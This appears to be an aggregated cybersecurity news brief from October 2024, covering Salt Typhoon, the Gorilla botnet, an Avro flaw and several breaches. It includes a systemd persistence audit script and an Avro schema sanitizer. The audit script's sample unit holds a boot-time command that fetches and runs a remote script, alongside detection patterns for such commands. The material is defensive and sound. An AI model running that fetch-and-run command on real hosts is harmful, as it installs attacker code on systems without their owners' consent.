Daily Brief

Find articles below, see 'DETAILS' for generated summaries

Total articles found: 12813

Checks for new stories every ~15 minutes

2024-10-07 17:20:53 theregister NATION STATE ACTIVITY Chinese Cyberspies Breach Major US Telecom Networks
Chinese espionage group Salt Typhoon reportedly infiltrated the networks of major US telecom providers Verizon, AT&T, and Lumen Technologies, potentially accessing the systems those carriers use to fulfil court-authorized wiretaps for law enforcement. The breaches could have allowed unauthorized access to systems sharing domestic communication data with law enforcement, in addition to interception of general internet traffic across the US. Whether systems used for foreign intelligence surveillance were also compromised remains unclear. The FBI and other agencies are investigating the extent and nature of the data compromised. Questions about the breaches directed to the US Cybersecurity and Infrastructure Security Agency (CISA) were referred back to the affected providers, highlighting ongoing concerns around communication and transparency. Verizon reported a recent outage caused by a misconfiguration, unrelated to any breach or to the Salt Typhoon incident. Initial intrusion vectors are still being investigated, with suspicion falling on compromised Cisco routers, which have been exploited in previous Chinese state-sponsored campaigns. FBI Director Christopher Wray has previously emphasized the scale of Chinese state-sponsored cyber operations and their impact on US security and data privacy.
2024-10-07 14:51:46 bleepingcomputer NATION STATE ACTIVITY Chinese Hackers Target U.S. ISPs to Access Government Wiretaps
The Chinese hacking group Salt Typhoon breached multiple U.S. internet service providers, including Verizon and AT&T, aiming to access U.S. government wiretapping data. The group, active since at least 2019, is known for targeting government entities and telecommunications providers, predominantly in Southeast Asia. The intrusion may have given the attackers access to systems handling lawful U.S. network wiretapping requests for an indeterminate period. The true extent and type of data compromised are still being assessed by U.S. authorities and cybersecurity experts. Notable previous attacks by this group involved exploiting Microsoft Exchange Server vulnerabilities and deploying custom malware such as SparrowDoor. Recent investigations suggest that Cisco routers may have been compromised in the attack, although Cisco has not yet confirmed that its equipment was involved. The affected U.S. service providers have generally not commented on the breach, and investigations by private and governmental bodies are ongoing. This incident is part of a broader trend of Chinese APT groups increasingly targeting network infrastructure in the U.S. and Europe for cyberespionage.
2024-10-07 14:05:38 bleepingcomputer MALWARE Criminal IP Enhances Hybrid Analysis with Domain Intelligence
Criminal IP has partnered with Hybrid Analysis to integrate advanced domain scanning into Hybrid Analysis's malware threat intelligence platform. This collaboration aims to provide security professionals with deeper insights and more effective threat mitigation strategies. Hybrid Analysis uses dynamic and static analysis techniques for comprehensive examination of malicious files, enhancing detection and response capabilities. Criminal IP's domain scanning leverages AI to monitor domains and URLs for phishing, malware hosting, and other threats, enriching threat profiles. The integration offers features such as AI-powered phishing detection and malicious link identification to improve the accuracy of threat detection. Users can access detailed information on technology usage, abuse records, and CVE vulnerabilities through Criminal IP's expanded database. This collaboration follows AI SPERA's expansion in the CTI solutions sector, with Criminal IP launching in 2023 and partnering with major global security firms. The service, supporting multiple languages, aims to serve a diverse global audience, emphasizing user-friendly interfaces and comprehensive data analysis.
2024-10-07 11:27:01 thehackernews CYBERCRIME Annual Financial Toll from API Vulnerabilities and Bot Attacks
Global losses due to insecure APIs and bot attacks range between $94 billion to $186 billion annually, significantly impacting businesses worldwide. API-related security incidents have increased by 40% in 2022, with an additional 9% rise in 2023, indicating a growing threat landscape. Bot-driven attacks surged by 88% in 2022 and 28% more in 2023, influenced by factors like digital transaction increases and geopolitical tensions. Large enterprises, especially those with over $1 billion in annual revenue, are two to three times more likely to suffer from automated API abuse. Bots frequently exploit business logic vulnerabilities in APIs, leading to substantial financial losses estimated up to $17.9 billion annually. Imperva stresses the urgent need for businesses to adopt robust security measures against these threats to avoid devastating financial and reputational damage.
2024-10-07 10:10:02 thehackernews MISCELLANEOUS Shift to Passwordless Authentication Highlighted in Upcoming Webinar
The rise of hybrid work and increased digitization are major factors driving the shift towards passwordless authentication. Traditional password systems are vulnerable to threats such as phishing and identity theft, prompting consideration of passwordless alternatives. Difficulty remembering multiple passwords creates its own risk, since users often reuse passwords across systems. Passwordless methods such as biometrics, combined with multi-factor authentication, improve both data security and user satisfaction, but come with their own challenges. The upcoming webinar, "Modernization of Authentication: Passwords vs Passwordless and MFA", will feature James Azar, CISO, and Darren James, Sr. Product Manager at Specops Software. It aims to provide best practices for modern authentication, addressing the growing need for reliable data protection in the face of evolving threats and compliance standards. Attendees will learn how to strengthen security while maintaining productivity for both in-office and remote teams.
2024-10-07 10:04:41 thehackernews DDOS New Gorilla Botnet Executes 300k DDoS Attacks in a Month
Cybersecurity firm NSFOCUS identified a new botnet called Gorilla (also tracked as GorillaBot), derived from the Mirai source code, which orchestrated over 300,000 DDoS attacks between September 4 and 27, 2024. Gorilla targeted a diverse set of sectors including universities, government entities, telecoms, banks, and the gaming industry across more than 100 countries, most heavily China, the U.S., Canada, and Germany. The botnet primarily used UDP flood, ACK BYPASS flood, VSE flood, SYN flood, and ACK flood attack methods; because UDP is connectionless, source addresses can be spoofed and large volumes of traffic generated. Gorilla supports multiple CPU architectures and connects to one of five pre-set command-and-control (C2) servers to receive attack instructions. The malware can also exploit a known vulnerability in Apache Hadoop YARN RPC for remote code execution, a tactic seen in the wild as early as 2021. Persistence is achieved by creating a 'custom.service' unit in the system's systemd service directory that downloads and executes a shell script from a remote server at every boot. It employs encryption methods associated with the Keksec group and uses anti-detection techniques to maintain control over infected IoT devices and cloud hosts. The scale and sophistication of the campaign underline the growing capability of emerging botnets.
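The persistence mechanism described above, a service unit enabled at boot whose command line fetches a script from a remote server and runs it, is easy to hunt for on a Linux host. The following audit script is an added example written for this brief; it is not NSFOCUS's analysis tooling or anything taken from the botnet. The two unit files embedded in it are constructed for illustration, and the IP address, URL, script name and paths are placeholders rather than indicators from the report. audit_directory() is included so the same checks can be pointed at a real /etc/systemd/system; the samples let it run offline.

```python
"""Audit systemd unit files for boot-time persistence that fetches and runs
remote code, the pattern described for Gorilla's 'custom.service'.

Added example, not NSFOCUS's code or anything from the botnet. SAMPLE_UNITS
are constructed; the URL, IP, paths and unit names are placeholders."""
import re
from pathlib import Path
from typing import Dict, List

# Download tools, remote URL schemes, and "pipe into a shell" shapes.
DOWNLOADER = re.compile(r"\b(?:curl|wget|tftp|ftpget)\b")
REMOTE_URL = re.compile(r"\b(?:https?|tftp|ftp)://\S+", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sh|bash|ash|dash)\b")
# World-writable scratch directories a legitimate service rarely executes from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_unit(text: str) -> Dict[str, List[str]]:
    """Collect every Exec* directive and the WantedBy targets of one unit file."""
    unit: Dict[str, List[str]] = {"exec": [], "wanted_by": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";", "[")):
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if key.startswith("Exec"):          # ExecStart, ExecStartPre, ExecStop, ...
            unit["exec"].append(value)
        elif key == "WantedBy":
            unit["wanted_by"].extend(value.split())
    return unit


def audit_unit(name: str, text: str) -> List[str]:
    """Return findings for one unit file; an empty list means nothing matched."""
    unit = parse_unit(text)
    findings: List[str] = []
    for cmd in unit["exec"]:
        cmd = cmd.lstrip("-@+:!")           # systemd Exec= prefix characters
        if DOWNLOADER.search(cmd) and REMOTE_URL.search(cmd):
            findings.append(f"{name}: Exec line downloads from a remote URL: {cmd}")
        if PIPE_TO_SHELL.search(cmd):
            findings.append(f"{name}: Exec line pipes command output into a shell: {cmd}")
        if any(d in cmd for d in SCRATCH_DIRS):
            findings.append(f"{name}: Exec line runs code from a scratch directory: {cmd}")
    if findings and "multi-user.target" in unit["wanted_by"]:
        findings.append(f"{name}: suspicious unit is enabled at boot (WantedBy=multi-user.target)")
    return findings


def audit_directory(path: str = "/etc/systemd/system") -> Dict[str, List[str]]:
    """Audit every *.service file under a real systemd unit directory."""
    return {p.name: audit_unit(p.name, p.read_text(errors="replace"))
            for p in Path(path).glob("*.service")}


# Constructed sample units: one mimicking the reported pattern, one benign.
SAMPLE_UNITS = {
    "custom.service": """[Unit]
Description=custom
After=network.target

[Service]
Type=simple
ExecStart=/bin/sh -c "curl -s http://198.51.100.10/stage2.sh -o /tmp/stage2.sh; sh /tmp/stage2.sh"
Restart=always

[Install]
WantedBy=multi-user.target
""",
    "sshd.service": """[Unit]
Description=OpenBSD Secure Shell server
After=network.target

[Service]
ExecStartPre=/usr/sbin/sshd -t
ExecStart=/usr/sbin/sshd -D
Restart=on-failure

[Install]
WantedBy=multi-user.target
""",
}


def audit_samples() -> Dict[str, List[str]]:
    return {name: audit_unit(name, text) for name, text in SAMPLE_UNITS.items()}


if __name__ == "__main__":
    for unit_name, hits in audit_samples().items():
        print(("SUSPICIOUS " if hits else "ok         ") + unit_name)
        for hit in hits:
            print("    " + hit)
```

The checks are deliberately narrow (download tool plus remote URL, pipe into a shell, execution from a scratch directory) so that ordinary services such as the sshd unit produce no findings; a unit that trips any of them and is also wanted by multi-user.target is the boot-time persistence shape worth pulling for review. Run it against /etc/systemd/system and the user unit directories on suspect hosts, and pair it with a check of unit file modification times.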
2024-10-07 09:33:56 thehackernews MALWARE Critical Security Flaw in Apache Avro Java SDK Exposes Risks
A severe vulnerability in the Apache Avro Java SDK, tracked as CVE-2024-47561, affects all versions prior to 1.11.4. The flaw allows arbitrary code execution when an application parses an Avro schema supplied by an untrusted user. Users are advised to upgrade promptly to Apache Avro 1.11.4 or 1.12.0, where the issue is resolved. Kostya Kortchinsky of the Databricks security team discovered the vulnerability, highlighting the risk of parsing unsanitized schemas. Mitigations for deployments that cannot upgrade immediately include sanitizing schemas before parsing and avoiding parsing user-supplied schemas altogether. Mayuresh Dani of Qualys noted that no public proof-of-concept is available, but that the ReflectData and SpecificData code paths are the likely avenues for exploitation. The widespread use of Apache Avro, especially among U.S. organizations, underscores the need for timely updates to prevent unauthorized code execution.
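"Sanitize schemas before parsing" is easy to say and harder to do well, so here is what an allow-list pre-check can look like. This is an added example written for this brief, not Apache Avro's code and not the Databricks or Qualys analysis. It walks the schema JSON and rejects anything outside the core Avro schema vocabulary before a real parser sees it, so attacker-controlled attributes never reach class-binding logic. The three names in JAVA_BINDING_ATTRS are the attributes Avro's Java reflect API uses to bind schema nodes to Java classes; rejecting every other unknown attribute as well is this example's own conservative policy, chosen because the article does not publish the exact trigger. The sample schemas are constructed and the Java class name in HOSTILE_SCHEMA is a placeholder. None of this replaces upgrading to 1.11.4 or 1.12.0.

```python
"""Pre-parse allow-list check for Avro schemas that arrive from untrusted callers.
Added example, not Apache Avro's code. Sample schemas are constructed; the Java
class name in HOSTILE_SCHEMA is a placeholder."""
import json

PRIMITIVE_TYPES = {"null", "boolean", "int", "long", "float", "double", "bytes", "string"}
COMPLEX_TYPES = {"record", "enum", "array", "map", "fixed"}
# Attributes permitted on each kind of schema object (Avro specification vocabulary).
ALLOWED_KEYS = {
    "primitive": {"type", "logicalType", "precision", "scale"},
    "record": {"type", "name", "namespace", "doc", "aliases", "fields"},
    "field": {"name", "type", "doc", "default", "order", "aliases"},
    "enum": {"type", "name", "namespace", "doc", "aliases", "symbols", "default"},
    "array": {"type", "items", "default"},
    "map": {"type", "values", "default"},
    "fixed": {"type", "name", "namespace", "aliases", "size"},
}
# Avro Java reflect-API attributes that bind a schema node to a Java class.
JAVA_BINDING_ATTRS = {"java-class", "java-key-class", "java-element-class"}


class UnsafeSchema(ValueError):
    """Raised for any schema that must not reach the real parser."""


def _check_keys(obj, kind, path):
    for key in obj:
        if key in JAVA_BINDING_ATTRS:
            raise UnsafeSchema(f"{path}: class-binding attribute {key!r} is not allowed")
        if key not in ALLOWED_KEYS[kind]:
            raise UnsafeSchema(f"{path}: unexpected attribute {key!r} on {kind}")


def _walk(node, path, named):
    if isinstance(node, str):                 # primitive name or reference to a named type
        if node in PRIMITIVE_TYPES or node in named:
            return
        raise UnsafeSchema(f"{path}: unknown type {node!r}")
    if isinstance(node, list):                # union
        for i, branch in enumerate(node):
            _walk(branch, f"{path}[{i}]", named)
        return
    if not isinstance(node, dict) or not isinstance(node.get("type"), str):
        raise UnsafeSchema(f"{path}: schema object must carry a string 'type'")
    kind = node["type"]
    if kind in PRIMITIVE_TYPES:
        _check_keys(node, "primitive", path)
        return
    if kind not in COMPLEX_TYPES:
        raise UnsafeSchema(f"{path}: unsupported type {kind!r}")
    _check_keys(node, kind, path)
    if kind in ("record", "enum", "fixed"):   # register the name so later references resolve
        name = node.get("name")
        if not isinstance(name, str):
            raise UnsafeSchema(f"{path}: named type without a string name")
        named.add(name)
        if isinstance(node.get("namespace"), str):
            named.add(f"{node['namespace']}.{name}")
    if kind == "record":
        for i, field in enumerate(node.get("fields", [])):
            fpath = f"{path}.fields[{i}]"
            if not isinstance(field, dict):
                raise UnsafeSchema(f"{fpath}: field must be an object")
            _check_keys(field, "field", fpath)
            _walk(field.get("type"), f"{fpath}.type", named)
    elif kind == "array":
        _walk(node.get("items"), f"{path}.items", named)
    elif kind == "map":
        _walk(node.get("values"), f"{path}.values", named)


def sanitize_schema(schema_json, max_bytes=64 * 1024):
    """Return the parsed schema JSON if it passes every check, else raise UnsafeSchema."""
    if len(schema_json.encode("utf-8")) > max_bytes:
        raise UnsafeSchema("schema exceeds size limit")
    try:
        schema = json.loads(schema_json)
    except json.JSONDecodeError as exc:
        raise UnsafeSchema(f"schema is not valid JSON: {exc}") from None
    _walk(schema, "$", set())
    return schema


def is_safe(schema_json):
    try:
        sanitize_schema(schema_json)
        return True
    except UnsafeSchema:
        return False


# Constructed samples: a benign record, and one carrying a Java class-binding attribute.
SAFE_SCHEMA = json.dumps({
    "type": "record", "name": "Event", "namespace": "example",
    "fields": [{"name": "id", "type": "long"},
               {"name": "tags", "type": {"type": "array", "items": "string"}},
               {"name": "note", "type": ["null", "string"], "default": None}]})
HOSTILE_SCHEMA = json.dumps({
    "type": "record", "name": "Event",
    "fields": [{"name": "payload",
                "type": {"type": "string", "java-class": "com.example.Placeholder"}}]})
```

The shape of the check matters more than the exact key lists: the sanitizer never tries to enumerate bad attributes beyond the three binding names, it enumerates the good ones and fails closed on everything else, including oversized documents and unresolvable type names. Run the validated JSON string, not the original input, through the real Avro parser afterwards, and keep the upgrade on the schedule regardless.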
2024-10-07 09:18:20 thehackernews CYBERCRIME Google Implements Auto-Block on Unsafe App Sideloading in India
Google is piloting a new security measure in India that automatically blocks the sideloading of potentially unsafe Android apps, following tests in Singapore, Thailand, and Brazil. The initiative aims to protect users from installing malicious apps from sources outside the Google Play Store, such as web browsers, messaging apps, and file managers. The feature was first launched in Singapore in February and has since blocked nearly 900,000 high-risk app installations. It works by analyzing, in real time, the permissions requested by an app being sideloaded, specifically targeting permissions often misused for financial fraud. Google Play Protect blocks the installation if it detects permission requests in the app's manifest that are typical of malicious operations. The pilot is set to begin next month and will eventually be available on all Android devices in India with Google Play services. Google advises affected developers to review their apps' permission requests against its best practices. This development extends Google's efforts initiated last year with the DigiKavach program, aimed at curbing online financial fraud in India.
2024-10-07 09:18:20 thehackernews NATION STATE ACTIVITY International Efforts Thwart Evil Corp and LockBit Ransomware
International law enforcement agencies jointly targeted the LockBit ransomware operation, resulting in the arrest of four individuals and the takedown of nine servers. Authorities named Aleksandr Ryzhenkov, a Russian national and a high-ranking member of the Evil Corp cybercrime group, as a LockBit affiliate, and the UK sanctioned 16 members of Evil Corp, increasing pressure on the group. The same weekly recap also stresses the importance of maintaining a Software Bill of Materials (SBOM) to track third-party components and open-source libraries, with regular updates and awareness of what software contains described as crucial to reducing risk and responding quickly to vulnerabilities. The roundup covers a varied set of challenges, including scams, malware, and deceptive practices in app stores, and its overarching advice is to stay vigilant and informed about the ingredients of your software.
2024-10-07 08:32:24 theregister MISCELLANEOUS Tech Fatigue Over Cookie Consent and Regulatory Shortfalls
A significant portion of British citizens feel overwhelmed by constant requests for cookie permissions and privacy consents, often resulting in passive compliance. This weariness is made worse by the complicated and obtrusive consent mechanisms big tech firms use, which discourage engagement and understanding. Data protection laws such as the EU's ePrivacy Directive and GDPR offer choice in theory, but in practice they do nothing to counteract the fatigue users experience. The frequent and repetitive nature of consent requests has bred widespread apathy, undermining data protection in practice. One suggested solution is to standardize cookie consent through an API that lets users set default privacy preferences once and have them applied across services. This would streamline the user experience, align with the principle of personal data protection, and ease the burden on site and service creators. Standardizing consent management through an API would also make compliance easier for regulators and activists to monitor and enforce.
2024-10-07 06:45:23 thehackernews DATA BREACH EU Court Restricts Meta's Use of Data for Targeted Advertising
The Court of Justice of the European Union (CJEU) ruled that Meta Platforms must limit its use of personal data collected from Facebook for targeted advertising, even where users have consented. The decision enforces the General Data Protection Regulation (GDPR), whose data minimization principle in Article 5(1)(c) restricts processing to what is strictly necessary and so prohibits the indefinite use of aggregated personal data for ads. The case originated with privacy activist Maximilian Schrems, who challenged Meta's use of personalized ads based on sensitive personal information. The ruling makes clear that consent to personalized advertising does not permit indefinite use of a person's data, and it applies to any online advertising business that lacks strict data deletion practices. Meta responded that it has invested in embedding privacy into its products and does not use sensitive categories of data to personalize ads. The ruling could significantly affect how other ad-driven businesses in the EU handle and process personal data for advertising.
2024-10-06 15:14:01 bleepingcomputer DATA BREACH Data Breach at FBCS Affects Comcast and Truist Bank Customers
Financial Business and Consumer Solutions (FBCS), a U.S. debt collection agency, experienced a data breach between February 14 and February 26, 2024, impacting multiple companies including Comcast and Truist Bank. Initially estimated at 1.9 million affected individuals, the number of compromised records escalated to 4.2 million by July after further investigation. Comcast disclosed that 273,703 of its customers had sensitive information such as Social Security numbers and account details exposed, and offered them 12 months of identity theft protection. Truist Bank also notified its customers of the breach, indicating varied types of exposed data including names, account numbers, and Social Security numbers; the total number of affected customers remains undisclosed. FBCS's financial troubles worsened following the breach, complicating the notification and remediation process for impacted businesses. The ongoing internal investigation at FBCS signals potential future revelations concerning the extent and details of the data compromise.
2024-10-06 14:17:56 bleepingcomputer CYBERCRIME Man Admits to $37 Million Cryptocurrency Theft from 571 Victims
Evan Frederick Light, a 21-year-old from Indiana, pleaded guilty to stealing $37,704,560 in cryptocurrency from 571 victims during a 2022 cyberattack. The theft targeted an unnamed investment holdings company in Sioux Falls, South Dakota, where Light, along with unknown co-conspirators, impersonated a legitimate client to gain server access. After infiltrating the servers, they exploited vulnerabilities within the network to access and steal personal information of the company's clients, subsequently using this data to steal cryptocurrencies held by these clients. The stolen funds were laundered through various coin-mixing services and gambling websites to obscure their origin and conceal the identities of the perpetrators. Despite attempts to hide the illegal activities, the FBI was able to track down and arrest Evan Light, leading to his indictment in May 2023. Light now faces up to 20 years of imprisonment per count, three years of supervised release, and potential restitution, although the recovery of the stolen funds remains uncertain. The FBI highlighted a record $5.6 billion in cryptocurrency losses in 2023, emphasizing the importance of using secure practices such as cold wallets and multi-factor authentication to protect digital assets.
2024-10-06 13:01:22 bleepingcomputer MISCELLANEOUS Google Pay Users Alarmed by Accidental New Card Emails
Google Pay mistakenly sent emails to users stating a "new card" had been added to their accounts. The notifications referred to old, often expired cards which significantly confused recipients. Many recipients voiced concerns on social media and Google's forums, fearing their accounts had been compromised. Users across the platform, including individuals who had received multiple notifications, expressed fears of hacking. Google later clarified that the emails were sent accidentally and assured there was no security breach. Users were advised that no action was needed and their account information was secure. Google apologized for the error and any resulting inconvenience, reinforcing the importance of regular review of account payment methods.
2024-10-05 14:17:13 bleepingcomputer MISCELLANEOUS MoneyGram Cyberattack Not Ransomware, Corporate Systems Breached
MoneyGram experienced a significant cyberattack leading to a five-day service outage starting September 20. The attack caused disruptions, preventing customers from accessing or transferring money and conducting online activities. Despite initial suspicions, investigations confirmed that ransomware was not the cause of the incident. Cybersecurity firm CrowdStrike and law enforcement were involved in investigating and restoring systems. Systems were only brought back online after implementing heightened security measures; most services have resumed. The intrusion was attributed to a social engineering attack targeting MoneyGram’s internal help desk, which compromised employee credentials. The attackers targeted employee information within MoneyGram’s Windows Active Directory Services but were detected and blocked before further damage could occur. MoneyGram has not publicly blamed any specific group for the attack; however, the method resembles those used by hacker group Scattered Spider in other incidents.